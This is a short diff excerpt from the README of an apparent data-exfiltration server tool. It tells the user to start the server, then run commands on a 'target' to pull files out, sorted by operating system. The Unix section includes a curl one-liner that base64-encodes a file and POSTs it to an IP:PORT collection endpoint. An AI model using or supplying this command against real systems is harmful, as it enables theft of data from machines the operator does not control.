xen00rw/exfil_server/README.md

 ```bash
 $ python3 server.py
 ```
-4 - Now on the target, there are some ways to exfiltrate<br>
+4 - Now on the target, there are some ways to exfiltrate, based on operation system:<br>

+# Unix
 - Single File
 ```bash
 $ cat file.txt | base64 -w 0 | curl -XPOST 'http://IP:PORT/post' --data-binary @-